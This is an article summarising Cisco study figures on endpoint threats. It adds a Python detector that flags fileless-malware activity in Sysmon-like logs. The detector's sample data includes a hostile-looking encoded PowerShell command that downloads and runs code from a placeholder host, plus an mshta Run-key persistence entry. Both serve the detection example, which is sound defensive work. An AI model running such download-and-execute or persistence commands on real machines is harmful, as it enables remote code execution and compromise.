According to a recent Cisco study titled ‘Threat Landscape Trends,’ fileless threats rank as the most common category of critical-severity cybersecurity threat to endpoints.
Endpoint security threats can be divided into three main categories on the basis of critical-severity Indicators-of-Compromise (IOCs):
The first segment is fileless malware, such as Kovter, Poweliks, Divergent, and LemonDuck, which comprises 30% of critical-severity threats. These are considered the most destructive and require immediate attention.
Secondly, dual-use tools such as PowerShell Empire, CobaltStrike, PowerSploit, and Metasploit, which are commonly used for both exploitation and post-exploitation tasks, make up 24% of critical threats.
The last one on the list is credential-dumping tools, most commonly Mimikatz, used to scrape login credentials from a compromised computer; these comprise 21% of critical threats.
The remaining 25% contains a mix of threats, such as ransomware (Maze, Ryuk, and BitPaymer); worms (Qakbot and Ramnit); RATs (Corebot and Glupteba); banking Trojans (Dridex, Dyre, Astaroth, and Azorult); and other downloaders, wipers, and rootkits.
The fileless threat method enables an attacker to maintain persistence and evade detection by abusing tools that are already present on the system to carry out the attack. Examples include the FritzFrog botnet and the Netwalker ransomware.
To defend against fileless malware, users are advised to harden their endpoints by restricting the execution of unknown files, monitoring processes for unusual changes, watching the registry for strange process-injection attempts, and keeping an eye on connections between endpoints.
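The process and registry monitoring recommended above can be expressed as simple detection logic. The following is an added example, not code from the Cisco study or this article: it scans constructed Sysmon-like process-creation and registry-value-set records for two fileless patterns, a built-in script host launched with an encoded or download-style command line, and a Run-key value that invokes a script host instead of a file on disk (the Kovter/Poweliks technique). Event field names, paths, SIDs and the placeholder host are assumptions.

```python
import base64
import re
# Built-in Windows binaries that fileless malware abuses to run code without
# dropping a file ("living off the land"); matched on the image basename.
LOLBINS = {"powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe", "regsvr32.exe", "rundll32.exe"}
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
SUSPICIOUS_PS = re.compile(r"(?i)\biex\b|invoke-expression|downloadstring|frombase64string")
RUN_KEY = re.compile(r"(?i)\\software\\microsoft\\windows\\currentversion\\run(once)?\\")
SCRIPT_IN_REG = re.compile(r"(?i)\bmshta\b|javascript:|vbscript:|powershell")

def decode_encoded_command(cmdline):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE), else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def scan_events(events):
    """Flag LOLBin launches with encoded/download command lines and script hosts launched from Run keys."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            image = ev["image"].rsplit("\\", 1)[-1].lower()
            if image not in LOLBINS:
                continue
            decoded = decode_encoded_command(ev["cmdline"])
            if decoded is not None or SUSPICIOUS_PS.search(ev["cmdline"]):
                findings.append({"rule": "lolbin-suspicious-cmdline", "image": image, "decoded": decoded})
        elif ev["type"] == "registry":
            if RUN_KEY.search(ev["target"]) and SCRIPT_IN_REG.search(ev["data"]):
                findings.append({"rule": "script-in-run-key", "target": ev["target"], "data": ev["data"]})
    return findings

# Constructed sample telemetry (not real logs) in a Sysmon-like shape: two process-creation
# and two registry value-set records. Hostnames, SIDs and value names are placeholders.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/s')".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Enc " + ENCODED},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},  # benign admin use
    {"type": "registry", "target": r"HKU\S-1-5-21-PLACEHOLDER\Software\Microsoft\Windows\CurrentVersion\Run\abcd",
     "data": "mshta javascript:placeholder_payload"},
    {"type": "registry", "target": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "data": r'"C:\Program Files\OneDrive\OneDrive.exe" /background'},  # benign
]
```

Running `scan_events(SAMPLE_EVENTS)` returns two findings, one per malicious record, and leaves the benign PowerShell script and the OneDrive Run entry alone.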